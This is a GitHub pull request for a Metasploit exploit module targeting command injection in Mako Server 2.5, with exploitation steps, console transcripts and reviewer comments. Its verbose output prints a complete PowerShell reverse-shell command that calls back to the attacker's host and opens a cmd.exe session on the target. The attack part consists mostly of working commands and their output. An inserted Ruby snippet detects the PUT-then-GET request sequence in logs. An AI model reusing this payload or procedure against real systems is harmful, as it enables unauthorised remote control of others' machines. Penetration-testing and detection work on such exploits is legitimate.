
Add Mako Server v2.5 command injection module/docs #9133

Merged
merged 2 commits into from Nov 8, 2017

Conversation

shogunlab
Contributor

@shogunlab shogunlab commented Oct 27, 2017

Add Mako Server v2.5 command injection module/docs.

This module exploits an OS command injection vulnerability in the tutorial page of Mako Server version 2.5 on Windows x86/x64 systems. It works by injecting arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Input will be saved on the target machine and can be executed by sending a GET request to manage.lsp.

[Screenshot: msf-mako-example]

Verification Steps

  • Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with PowerShell, for this example to work)
  • After installer finishes, double click the "Mako-Demo" shortcut on the desktop
  • Start msfconsole on host
  • use exploit/windows/http/makoserver_cmd_exec
  • set RHOST <IP address of target system>
  • check
  • set PAYLOAD cmd/windows/reverse_powershell
  • set LHOST <IP address of host system>
  • exploit
  • You should get a Windows command shell

Documentation

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md

Example Output

msf > use exploit/windows/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>

Example Verbose Output

msf > use exploit/windows/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true
VERBOSE => true
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > check

[*] Trying to detect running Mako Server and necessary files...
[*] Mako Server save.lsp returns correct ouput.
[*] 10.10.10.3:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] Sending payload to target...
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
[*] Sending PUT request to save.lsp...
[*] Sending GET request to manage.lsp...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>
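As an added defender-side example (not code from this PR or from the Metasploit module), the following Ruby scans Mako Server access log lines for a client that writes to save.lsp with a PUT and then requests manage.lsp shortly afterwards, the two-step sequence the description above relies on. The combined log format, the tutorial paths and the sample lines are constructed assumptions.

```ruby
# Added example, not part of the PR: flag the PUT save.lsp -> GET manage.lsp
# request sequence in a Mako Server access log.
require 'time'

# Combined-log-format line (assumed): client, timestamp, "METHOD path HTTP/x", status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Returns one alert per client that PUT to save.lsp and then GET manage.lsp
# within `window` seconds (the order in which the exploit uses the two pages).
def find_mako_injection(lines, window: 300)
  pending = Hash.new { |h, k| h[k] = [] } # ip => timestamps of recent PUTs
  alerts = []
  lines.each do |line|
    ev = parse_line(line) or next
    if ev[:method] == 'PUT' && ev[:path].include?('save.lsp')
      pending[ev[:ip]] << ev[:time]
    elsif ev[:method] == 'GET' && ev[:path].include?('manage.lsp')
      put = pending[ev[:ip]].find { |t| (ev[:time] - t).between?(0, window) }
      next unless put
      alerts << { ip: ev[:ip], put_at: put, get_at: ev[:time] }
    end
  end
  alerts
end

# Constructed sample log (not real traffic); only 10.10.10.2 shows the sequence.
SAMPLE_LOG = <<~LOG.lines
  10.10.10.5 - - [26/Oct/2017:21:20:01 -0400] "GET /tutorial/ HTTP/1.1" 200 512
  10.10.10.2 - - [26/Oct/2017:21:21:05 -0400] "PUT /tutorial/save.lsp HTTP/1.1" 200 10
  10.10.10.2 - - [26/Oct/2017:21:21:07 -0400] "GET /tutorial/manage.lsp HTTP/1.1" 200 0
  10.10.10.7 - - [26/Oct/2017:21:30:00 -0400] "GET /tutorial/manage.lsp HTTP/1.1" 200 64
LOG

if __FILE__ == $0
  find_mako_injection(SAMPLE_LOG).each do |a|
    puts "ALERT #{a[:ip]}: PUT save.lsp at #{a[:put_at]} then GET manage.lsp at #{a[:get_at]}"
  end
end
```

A lone GET to manage.lsp (10.10.10.7 above) is not flagged, so the rule keys on the write-then-execute pair rather than on normal tutorial browsing.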

@acammack-r7
Contributor

Looks great, thanks! The exploit looks to work against the latest version and on other platforms, so I have added a ticket to do a little more work. If you want to do the porting let us know and we'll assign you to the ticket.

@acammack-r7
Contributor

Release Notes

This exploit targets arbitrary Lua injection in the examples shipped with the cross-platform Mako Server IoT development toolkit.

@shogunlab
Contributor Author

Awesome! Thank you so much, I would be happy to do the porting to Linux. I can start development on the port this week.

wvu added a commit to wvu/metasploit-framework that referenced this pull request Nov 9, 2017
@wvu
Contributor

wvu commented Nov 9, 2017

Please see additional changes in #9193. Thanks!

@shogunlab
Contributor Author

Thanks for adding those changes @wvu-r7! I learned a lot from looking at your commit, I'll make sure to include these sorts of additions in future code.

@wvu
Contributor

wvu commented Nov 9, 2017

To be honest, this is a really clean module. Great work!

@shogunlab
Contributor Author

That's great to hear, I'm trying hard to improve on my Ruby programming and get accustomed to the framework. Thank you for the kind words! 👍

@shogunlab shogunlab deleted the makoserver_cmd_exec branch November 9, 2017 19:12
@tdoan-r7 tdoan-r7 added and then removed the rn-exploit and rn-enhancement (release notes enhancement) labels Nov 17, 2017
todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Dec 18, 2017
@todb-r7

todb-r7 commented Dec 18, 2017

Whoops, that should have been #9311, not this PR, #9133.
